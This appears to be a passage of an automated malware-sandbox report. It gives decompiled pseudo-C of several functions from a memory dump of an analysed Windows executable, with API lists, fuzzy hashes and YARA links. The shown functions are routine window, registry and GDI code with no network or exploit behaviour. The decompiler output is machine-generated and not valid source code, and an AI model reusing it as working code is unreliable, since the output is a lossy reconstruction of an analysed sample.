                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog3
                                                                                                                            • String ID: `CD$EC$EC$EC
                                                                                                                            • API String ID: 431132790-2082637117
                                                                                                                            • Opcode ID: e0f5087a04911ae6f04e8d28154a56505ff09f122040d93a55f59436f8ce87ca
                                                                                                                            • Instruction ID: ce396b598fc54edb90a475b87fb057a33c30c28e4e40a9a858f2191b850aa541
                                                                                                                            • Opcode Fuzzy Hash: e0f5087a04911ae6f04e8d28154a56505ff09f122040d93a55f59436f8ce87ca
                                                                                                                            • Instruction Fuzzy Hash: DBF062B0B007108BDB34AF6A804975A72A06F44725F16457F9995672E1C77C8C90C68F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00410770 Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 95%
                                                                                                                            			E00410770(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E0041E981(E004318E6, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x410930) & 0x000000ff) * 4 +  &M00410908))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E00410E1D( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E0040E967();
							__ecx = __ebp + 0xc;
							__eax = E0040DB69(__ebp + 0xc, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E004035B0(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = E004078EE(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = E00407942(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E0040FAB4( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E00410637(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E0040E967();
							__ecx = __ebp + 0xc;
							__eax = E0040DB69(__ebp + 0xc, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = L0040A725(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = E00402C55( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E0041EA59(_t56);
			}






                                                                                                                            0x00410770
                                                                                                                            0x00410777
                                                                                                                            0x00410781
                                                                                                                            0x0041078a
                                                                                                                            0x004108fd
                                                                                                                            0x004108fd
                                                                                                                            0x00410790
                                                                                                                            0x00410797
                                                                                                                            0x00000000
                                                                                                                            0x004107bd
                                                                                                                            0x004107c0
                                                                                                                            0x004107c5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041079e
                                                                                                                            0x004107a1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00410871
                                                                                                                            0x00410874
                                                                                                                            0x00410877
                                                                                                                            0x0041087c
                                                                                                                            0x00410881
                                                                                                                            0x00410883
                                                                                                                            0x00410885
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004107b3
                                                                                                                            0x004107b6
                                                                                                                            0x004107a6
                                                                                                                            0x004107a6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004108d9
                                                                                                                            0x004108df
                                                                                                                            0x004108e2
                                                                                                                            0x004108ec
                                                                                                                            0x004108ef
                                                                                                                            0x004108f6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041088e
                                                                                                                            0x00410891
                                                                                                                            0x00410896
                                                                                                                            0x0041089c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004107cd
                                                                                                                            0x004107d1
                                                                                                                            0x004107d3
                                                                                                                            0x004107d6
                                                                                                                            0x004107d9
                                                                                                                            0x004107ef
                                                                                                                            0x00410801
                                                                                                                            0x00410804
                                                                                                                            0x0041080a
                                                                                                                            0x0041080d
                                                                                                                            0x00410810
                                                                                                                            0x00410810
                                                                                                                            0x00410815
                                                                                                                            0x0041081b
                                                                                                                            0x0041081e
                                                                                                                            0x00410823
                                                                                                                            0x0041082a
                                                                                                                            0x00410825
                                                                                                                            0x00410825
                                                                                                                            0x00410825
                                                                                                                            0x0041082d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00410835
                                                                                                                            0x00410839
                                                                                                                            0x00410855
                                                                                                                            0x00410855
                                                                                                                            0x00410858
                                                                                                                            0x0041085d
                                                                                                                            0x00410860
                                                                                                                            0x00410862
                                                                                                                            0x00410863
                                                                                                                            0x00410866
                                                                                                                            0x00410869
                                                                                                                            0x00000000
                                                                                                                            0x0041083b
                                                                                                                            0x0041083b
                                                                                                                            0x0041083e
                                                                                                                            0x00410844
                                                                                                                            0x00410846
                                                                                                                            0x0041084b
                                                                                                                            0x0041084f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041084f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004108a4
                                                                                                                            0x004108aa
                                                                                                                            0x004108ad
                                                                                                                            0x004108b2
                                                                                                                            0x004108b2
                                                                                                                            0x004108b2
                                                                                                                            0x004108b6
                                                                                                                            0x004108b6
                                                                                                                            0x004108b9
                                                                                                                            0x004108bc
                                                                                                                            0x004108c1
                                                                                                                            0x004108c6
                                                                                                                            0x004108c9
                                                                                                                            0x004108cc
                                                                                                                            0x004108cf
                                                                                                                            0x004107ab
                                                                                                                            0x004107ad
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00410797
                                                                                                                            0x004108ff
                                                                                                                            0x00410904

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 00410777
                                                                                                                            • SendMessageA.USER32 ref: 004107EF
                                                                                                                            • GetBkColor.GDI32(?), ref: 004107F8
                                                                                                                            • GetTextColor.GDI32(?), ref: 00410804
                                                                                                                            • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 00410896
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 187318432-0
                                                                                                                            • Opcode ID: a4aff6a96e883ed1377ca8cd43f6cbfb06e9064c649899a29996f1f6102a0536
                                                                                                                            • Instruction ID: 0963334fee5682f13038249b8a05a881939b9e1f91076d64a246819c7468d825
                                                                                                                            • Opcode Fuzzy Hash: a4aff6a96e883ed1377ca8cd43f6cbfb06e9064c649899a29996f1f6102a0536
                                                                                                                            • Instruction Fuzzy Hash: B1419F74804305DFCB10EF65C8449AA77B0FF04314F14892EE8A65B2A2D7B8E9D1CF99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406075 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E00406075(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x441590; // 0x4917eadc
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E0041E9B4(E004312AB, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E00403615(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E00406075(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E00402C55( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E0041D773(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}
















                                                                                                                            0x00406075
                                                                                                                            0x0040607c
                                                                                                                            0x00406080
                                                                                                                            0x00406087
                                                                                                                            0x0040608d
                                                                                                                            0x00406094
                                                                                                                            0x00406099
                                                                                                                            0x004060a1
                                                                                                                            0x004060a7
                                                                                                                            0x004060ad
                                                                                                                            0x004060b0
                                                                                                                            0x004060b3
                                                                                                                            0x004060b9
                                                                                                                            0x004060bd
                                                                                                                            0x004060c3
                                                                                                                            0x004060d1
                                                                                                                            0x004060d7
                                                                                                                            0x004060d9
                                                                                                                            0x004060db
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004060dd
                                                                                                                            0x004060e3
                                                                                                                            0x004060e7
                                                                                                                            0x004060f3
                                                                                                                            0x004060ff
                                                                                                                            0x00406103
                                                                                                                            0x00406109
                                                                                                                            0x0040610d
                                                                                                                            0x00406114
                                                                                                                            0x00406116
                                                                                                                            0x00000000
                                                                                                                            0x00406116
                                                                                                                            0x00000000
                                                                                                                            0x00406114
                                                                                                                            0x00406137
                                                                                                                            0x0040613d
                                                                                                                            0x00406147
                                                                                                                            0x00406152
                                                                                                                            0x0040613f
                                                                                                                            0x0040613f
                                                                                                                            0x00406145
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406145
                                                                                                                            0x00406157
                                                                                                                            0x00406157
                                                                                                                            0x00406162
                                                                                                                            0x0040616a
                                                                                                                            0x0040616b
                                                                                                                            0x0040616c
                                                                                                                            0x00406175
                                                                                                                            0x0040617a
                                                                                                                            0x00406181

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00406094
                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 004060B3
                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 004060D1
                                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 0040614C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00406157
                                                                                                                              • Part of subcall function 00403615: __EH_prolog3.LIBCMT ref: 0040361C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 301487041-0
                                                                                                                            • Opcode ID: 20639e41e938b10f37d77220facc92b64374b5d872626e6d13cb642a6c2c526d
                                                                                                                            • Instruction ID: a791c885130201762e4328830ca7a63bc86a7c0204db9b69126af88737bf001b
                                                                                                                            • Opcode Fuzzy Hash: 20639e41e938b10f37d77220facc92b64374b5d872626e6d13cb642a6c2c526d
                                                                                                                            • Instruction Fuzzy Hash: FA218DB5D002199BDB25DF54C841AEEBBB4EB08314F11413AE992B73D0DB385E449B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004195DC Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E004195DC(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x444480; // 0x60
					_t12 =  *0x444484; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E00407651(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                                            0x004195df
                                                                                                                            0x004195e2
                                                                                                                            0x004195e7
                                                                                                                            0x00419633
                                                                                                                            0x00419639
                                                                                                                            0x00000000
                                                                                                                            0x004195e9
                                                                                                                            0x004195f2
                                                                                                                            0x004195f7
                                                                                                                            0x0041962d
                                                                                                                            0x0041962f
                                                                                                                            0x0041963e
                                                                                                                            0x0041963e
                                                                                                                            0x00419650
                                                                                                                            0x00419658
                                                                                                                            0x0041965e
                                                                                                                            0x00419660
                                                                                                                            0x004195fe
                                                                                                                            0x00419600
                                                                                                                            0x00419604
                                                                                                                            0x0041960c
                                                                                                                            0x00419613
                                                                                                                            0x00419616
                                                                                                                            0x00419616
                                                                                                                            0x004195f7
                                                                                                                            0x00419667

                                                                                                                            APIs
                                                                                                                            • GetMapMode.GDI32(?,?,?,?,?,?,00412109,?,00000000,0000001C,00412A77,?,?,?,?,?), ref: 004195EC
                                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 00419626
                                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 0041962F
                                                                                                                              • Part of subcall function 00407651: MulDiv.KERNEL32(?,00000000,00000000), ref: 00407691
                                                                                                                              • Part of subcall function 00407651: MulDiv.KERNEL32(?,00000000,00000000), ref: 004076AE
                                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000060), ref: 00419653
                                                                                                                            • MulDiv.KERNEL32(00000000,000009EC,?), ref: 0041965E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDevice$Mode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 696222070-0
                                                                                                                            • Opcode ID: 1027542a33445bc774737617cd1ee012bd62f08bdb2d3fe09812daf877f15e63
                                                                                                                            • Instruction ID: d260fef8518c2c1b9b4801572d6af15098511bedb53044e742493909bc5fdc26
                                                                                                                            • Opcode Fuzzy Hash: 1027542a33445bc774737617cd1ee012bd62f08bdb2d3fe09812daf877f15e63
                                                                                                                            • Instruction Fuzzy Hash: 1D110835600A04AFCB216F55CD44D1FBBF9EF88720B11042AF94657360D775ED418FA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041966A Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E0041966A(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x444480; // 0x60
					_t12 =  *0x444484; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E004075E8(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                                            0x0041966d
                                                                                                                            0x00419670
                                                                                                                            0x00419675
                                                                                                                            0x004196c1
                                                                                                                            0x004196c7
                                                                                                                            0x00000000
                                                                                                                            0x00419677
                                                                                                                            0x00419680
                                                                                                                            0x00419685
                                                                                                                            0x004196bb
                                                                                                                            0x004196bd
                                                                                                                            0x004196cc
                                                                                                                            0x004196cc
                                                                                                                            0x004196de
                                                                                                                            0x004196e7
                                                                                                                            0x004196ec
                                                                                                                            0x004196ee
                                                                                                                            0x0041968c
                                                                                                                            0x0041968e
                                                                                                                            0x00419692
                                                                                                                            0x0041969a
                                                                                                                            0x004196a1
                                                                                                                            0x004196a4
                                                                                                                            0x004196a4
                                                                                                                            0x00419685
                                                                                                                            0x004196f5

                                                                                                                            APIs
                                                                                                                            • GetMapMode.GDI32(?,00000000,?,?,?,?,0041214D,?,?,?,?,?,?), ref: 0041967A
                                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 004196B4
                                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 004196BD
                                                                                                                              • Part of subcall function 004075E8: MulDiv.KERNEL32(?,00000000,00000000), ref: 00407628
                                                                                                                              • Part of subcall function 004075E8: MulDiv.KERNEL32(?,00000000,00000000), ref: 00407645
                                                                                                                            • MulDiv.KERNEL32(?,00000060,000009EC), ref: 004196E1
                                                                                                                            • MulDiv.KERNEL32(00000000,?,000009EC), ref: 004196EC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDevice$Mode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 696222070-0
                                                                                                                            • Opcode ID: 4ebb2b8d5223335ea5bcf0a73b4da9c2fa57f4d0605fd176376321100cc1593a
                                                                                                                            • Instruction ID: cf606f6f64b9c1bec2bddbc40a1ab9765e510deaeca7afecc4d10f6a5d189a91
                                                                                                                            • Opcode Fuzzy Hash: 4ebb2b8d5223335ea5bcf0a73b4da9c2fa57f4d0605fd176376321100cc1593a
                                                                                                                            • Instruction Fuzzy Hash: FA11CE39600600AFCB219F55CC54D5EBBF9EF89760B11042AF98597360C735ED818F68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040DF83 Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 93%
                                                                                                                            			E0040DF83(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				int _t26;
				CHAR* _t27;
				signed int _t28;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x441590; // 0x4917eadc
				_v8 = _t9 ^ _t28;
				_t21 = _a4;
				_t27 = _a8;
				if(_t21 == 0) {
					L1:
					E0040D8B0(_t22);
				}
				if(_t27 == 0) {
					goto L1;
				}
				_t26 = lstrlenA(_t27);
				_v264 = 0;
				E0041EC90(_t26,  &_v263, 0, 0xff);
				if(_t26 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t26 || lstrcmpA( &_v264, _t27) != 0) {
					_t16 = SetWindowTextA(_t21, _t27);
				}
				return E0041D773(_t16, _t21, _v8 ^ _t28, _t25, _t26, _t27);
			}

















                                                                                                                            0x0040df83
                                                                                                                            0x0040df83
                                                                                                                            0x0040df8c
                                                                                                                            0x0040df93
                                                                                                                            0x0040df97
                                                                                                                            0x0040df9d
                                                                                                                            0x0040dfa1
                                                                                                                            0x0040dfa3
                                                                                                                            0x0040dfa3
                                                                                                                            0x0040dfa3
                                                                                                                            0x0040dfaa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040dfb8
                                                                                                                            0x0040dfc3
                                                                                                                            0x0040dfca
                                                                                                                            0x0040dfd9
                                                                                                                            0x0040e002
                                                                                                                            0x0040e002
                                                                                                                            0x0040e016

                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040DFAD
                                                                                                                            • _memset.LIBCMT ref: 0040DFCA
                                                                                                                            • GetWindowTextA.USER32 ref: 0040DFE4
                                                                                                                            • lstrcmpA.KERNEL32(00000000,?), ref: 0040DFF6
                                                                                                                            • SetWindowTextA.USER32(?,?), ref: 0040E002
                                                                                                                              • Part of subcall function 0040D8B0: __CxxThrowException@8.LIBCMT ref: 0040D8C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 289641511-0
                                                                                                                            • Opcode ID: 3281205ee9395c1a79ab5b198e1a122c88f84679438f8ea09c1fb19b48d89927
                                                                                                                            • Instruction ID: d513b91babb070214be38285ccbc0dbc84bb03d634f4b4ee800cc182abc9875a
                                                                                                                            • Opcode Fuzzy Hash: 3281205ee9395c1a79ab5b198e1a122c88f84679438f8ea09c1fb19b48d89927
                                                                                                                            • Instruction Fuzzy Hash: C101F9B2A001147BDB20AF65DC85BDF77ACEF14355F104476F906E3181DAB8DE8887A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041D8F1 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
